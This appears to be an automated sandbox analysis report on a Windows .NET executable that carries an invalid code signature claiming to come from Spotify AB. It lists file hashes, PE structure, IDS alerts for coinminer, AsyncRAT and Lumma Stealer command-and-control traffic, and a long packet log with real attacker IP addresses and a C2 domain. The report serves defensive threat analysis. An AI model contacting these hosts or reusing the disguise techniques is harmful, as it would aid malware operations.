Preview:	..Pinging 216554 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9987920560586385
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PT54FFSL7ET46RASB.exe
File size:	1'319'800 bytes
MD5:	8199c105289d70af5446c7fd64496d7b
SHA1:	8402abc838e34e9dd996127ec39481f7cda4372b
SHA256:	ffee1e842c0a7932d3d3905a6677f35f3ea29dfb48661e537d28eb8b7212669d
SHA512:	07bb3ef470588e96c9050df1a704feeb48f0435cc93b899ed684bcd1af2d58a0d4ab86cf07bc9dd6583d84ba5122e685d54148233c9aa7bdafd3a7a8b65385b8
SSDEEP:	24576:u6vplPBeXFffwlFEPKJ1eVOduLqML78/W835v+uiHlgNdPvr:Bx+IT1eVMOqMLo/W834um0dPvr
TLSH:	EC5533704B13730AC21D553D5BF2423ADDF839C02549C2DBAD27F3B9E62060995F3AA8
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..f................................. ... ....@.. .......................`............`................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x540ede
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66EAE94C [Wed Sep 18 14:53:00 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	22/09/2022 02:00:00 20/10/2023 01:59:59
Subject Chain	CN=Spotify AB, O=Spotify AB, L=Stockholm, C=SE, SERIALNUMBER=5567037485, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE
Version:	3
Thumbprint MD5:	EF8873EED657F2DFE432077ADBAB8AFB
Thumbprint SHA-1:	3F76C6CC576963831FF44303BFCB98113C51C95E
Thumbprint SHA-256:	890C79F427B0C07DEF096FF66A402E9337F0F2D80DACA1256A7F572F7720DBAA
Serial:	04C530703A210EC1D6F83CB4FE1118C5

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x140e8c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x142000	0x5d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x13fa00	0x2978
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x144000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x140d54	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x13eee4	0x13f000	7a639360d4a0f1960287de37f5de8e8f	False	0.9986048013812696	data	7.99955051552786	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x142000	0x5d0	0x600	b14172e3390f211808da2ccabe78ad86	False	0.4342447916666667	data	4.130624633184886	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x144000	0xc	0x200	00ef2b4f1bb5c42ba89322c3c93ef5e8	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x1420a0	0x340	data			0.4411057692307692
RT_MANIFEST	0x1423e0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-19T02:25:03.235163+0200	2826930	ETPRO COINMINER XMR CoinMiner Usage	2	192.168.2.6	49730	95.179.241.203	80	TCP
2024-09-19T02:25:15.302701+0200	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	45.11.229.96	56001	192.168.2.6	49712	TCP
2024-09-19T02:25:28.033254+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.6	64325	1.1.1.1	53	UDP
2024-09-19T02:26:04.577720+0200	2055879	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)	1	192.168.2.6	55806	1.1.1.1	53	UDP
2024-09-19T02:26:05.085845+0200	2055880	ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)	1	192.168.2.6	49778	104.21.39.11	443	TCP
2024-09-19T02:26:05.243295+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	49778	104.21.39.11	443	TCP
2024-09-19T02:26:05.243295+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49778	104.21.39.11	443	TCP
2024-09-19T02:26:05.845797+0200	2055880	ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)	1	192.168.2.6	49780	104.21.39.11	443	TCP
2024-09-19T02:26:06.365549+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	49780	104.21.39.11	443	TCP
2024-09-19T02:26:06.365549+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	49780	104.21.39.11	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:25:14.601913929 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:14.606817007 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:14.606878042 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:14.609018087 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:14.614947081 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:14.625186920 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:14.630004883 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:15.274041891 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:15.274063110 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:15.274125099 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:15.296772957 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:15.302700996 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:15.482475996 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:15.531673908 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:16.997152090 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:17.002528906 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:17.002580881 CEST	49712	56001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:17.007446051 CEST	56001	49712	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:18.267884970 CEST	49715	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:18.272742987 CEST	39001	49715	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:18.272806883 CEST	49715	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:18.566771984 CEST	49715	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:18.571537018 CEST	39001	49715	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:18.571583033 CEST	49715	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:18.576457977 CEST	39001	49715	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:18.905446053 CEST	39001	49715	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.000421047 CEST	49715	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.046519041 CEST	39001	49715	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.057187080 CEST	49715	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.062724113 CEST	39001	49715	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.062778950 CEST	49715	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.162451982 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:19.162501097 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:19.162695885 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:19.182677984 CEST	49717	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.191204071 CEST	39001	49717	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.194048882 CEST	49717	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.211353064 CEST	49717	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.218961000 CEST	39001	49717	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.219022036 CEST	49717	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.226669073 CEST	39001	49717	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.254897118 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:19.254928112 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:19.726082087 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:19.726166010 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:19.732506037 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:19.732517004 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:19.732990026 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:19.776788950 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:19.823400974 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:19.838488102 CEST	39001	49717	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.970341921 CEST	49717	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.980210066 CEST	39001	49717	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.980930090 CEST	49717	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:19.986188889 CEST	39001	49717	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:19.986243010 CEST	49717	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:20.094955921 CEST	49718	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:21.122030973 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122160912 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122242928 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.122250080 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122277975 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122323036 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.122365952 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122560024 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122641087 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122687101 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.122698069 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122780085 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122826099 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.122832060 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.122879982 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.122884035 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.123738050 CEST	39001	49718	45.11.229.96	192.168.2.6
Sep 19, 2024 02:25:21.123831034 CEST	49718	39001	192.168.2.6	45.11.229.96
Sep 19, 2024 02:25:21.126616955 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.126672029 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.126677036 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.126827002 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.126878977 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.126883984 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.127258062 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.127338886 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.127398014 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.127403021 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.127818108 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.127880096 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.127883911 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.127918959 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.127923012 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.128035069 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.128083944 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.128087997 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.128885984 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.128968954 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.129014969 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.129020929 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.129122019 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.129174948 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.129179001 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.129354000 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.129797935 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.129945040 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.130045891 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.130089045 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.130095005 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.130861998 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.130911112 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.130914927 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.130951881 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.131289959 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.131614923 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.131661892 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.131666899 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.132061005 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.132110119 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.132114887 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.132630110 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.132816076 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.132867098 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.132873058 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.132975101 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.133390903 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.133451939 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.133960962 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.134010077 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.134757042 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.134808064 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.135183096 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.135232925 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.135938883 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.136008024 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.136208057 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.136269093 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.136430025 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.136486053 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.136820078 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.136871099 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.136945009 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.136991978 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.137326002 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.137372971 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.137738943 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.137789011 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.138712883 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.138765097 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.138808966 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.138851881 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.138884068 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.138937950 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.140028000 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.140086889 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.140135050 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.140182018 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.140227079 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.140311956 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.140363932 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.140368938 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141064882 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141124964 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.141129971 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141185999 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141228914 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.141232967 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141341925 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141402006 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.141407013 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141820908 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.141882896 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.141889095 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.142024994 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.142076969 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.142081976 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.142118931 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.142127991 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.142159939 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.142184973 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.142302990 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.142355919 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.142360926 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.143721104 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.143769979 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.143774033 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.143832922 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.143837929 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.143858910 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.143877029 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.143951893 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144000053 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.144005060 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144046068 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144097090 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.144102097 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144149065 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144196033 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.144201040 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144252062 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144299030 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.144303083 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144345045 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144392967 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.144397020 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144463062 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.144507885 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.144512892 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145061016 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145137072 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.145140886 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145174026 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.145175934 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145200968 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145225048 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.145313978 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145363092 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.145366907 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145412922 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145461082 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.145466089 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145529985 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.145584106 CEST	49716	443	192.168.2.6	172.67.143.156
Sep 19, 2024 02:25:21.145590067 CEST	443	49716	172.67.143.156	192.168.2.6
Sep 19, 2024 02:25:21.146258116 CEST	443	49716	172.67.143.156	192.168.2.6
